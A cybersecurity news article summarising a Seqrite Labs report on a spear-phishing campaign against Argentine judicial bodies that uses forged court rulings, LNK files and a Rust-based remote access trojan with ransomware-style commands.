Ddos 
A highly sophisticated cyber-espionage campaign has been discovered targeting the heart of Argentina’s legal system. Dubbed “Operation Covert Access” by researchers at Seqrite Labs, the campaign employs a stealthy, Rust-based Remote Access Trojan (RAT) to infiltrate judicial bodies, utilizing decoy documents so authentic that even legal professionals might be fooled.
The attackers initiate the infection chain via spear-phishing emails containing a ZIP archive. Inside, victims find what appears to be a critical judicial notice.
According to the analysis by Seqrite Labs, the decoy is not a generic template but a high-quality forgery. “The decoy document used in this campaign is a legitimate-looking Argentine federal court resolution written in formal legal Spanish”.
The document references real judicial bodies, specifically the “Tribunal Oral en lo Criminal y Correccional N° 2,” and discusses sensitive legal matters such as preventive detention reviews and conditional releases. The report notes that “its structure, terminology, and formatting closely mirror authentic court rulings, significantly increasing its credibility among legal and judicial professionals”.
While the victim reviews the court ruling, a complex infection process runs in the background. The attack begins when a user clicks a malicious LNK file disguised as a PDF. This triggers a hidden PowerShell command that reaches out to a GitHub repository to download the next stage of the payload.
The attackers abuse legitimate infrastructure to mask their activities. “The batch file establishes a connection to a GitHub-hosted URL and retrieves a second-stage payload,” allowing the malware to blend in with normal network traffic.
The core of the attack is a custom Remote Access Trojan (RAT) written in Rust, a programming language increasingly favored by cybercriminals for its performance and evasion capabilities. To avoid detection, the malware renames itself to msedge_proxy.exe and hides within the Microsoft Edge user data directory.
Once active, the RAT performs extensive checks to ensure it is not being watched. It scans for virtualization software like VMware and VirtualBox, and checks for analysis tools like Wireshark or Fiddler. “If any of those paths exist—typically directories or files associated with virtual machines, analysis tools, or sandboxes—the condition becomes true, and the malware immediately terminates the process”.
The capabilities of this RAT are alarming. It supports a modular command set that allows attackers to maintain persistence, harvest files, and even elevate privileges. More disturbingly, the malware includes commands for encryption, suggesting a potential dual-use for espionage and ransomware attacks.
“The malware receives C2 commands like _ENCRYPT_:_DECRYPT_… It checks for ransomware.enc (encrypted DLL) and ransomware.key, then decrypts the DLL using the provided key”.
This functionality implies that the attackers could easily pivot from stealing sensitive legal data to locking down the entire network.
By combining hyper-realistic social engineering with advanced technical evasion, the attackers have created a potent tool for compromising high-value targets.
As Seqrite Labs concludes in their report, “Operation Covert Access demonstrates how judicial-themed spear-phishing, combined with weaponized LNK files and a stealthy Remote Access Trojan (RAT), can be leveraged to establish long-term access within high-trust institutional environments”.
Related Posts:
- Argentina Busts Crypto Ring Linked to North Korea, Seizes Millions
- SVG Smuggling: Fake Colombian Judicial Lure Deploys AsyncRAT via Malicious HTA File
- Apple Leverages Supreme Court Ruling to Fight App Store External Payment Links Mandate
- Rust Lands in Windows 11 Kernel: A New Era for OS Security?
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
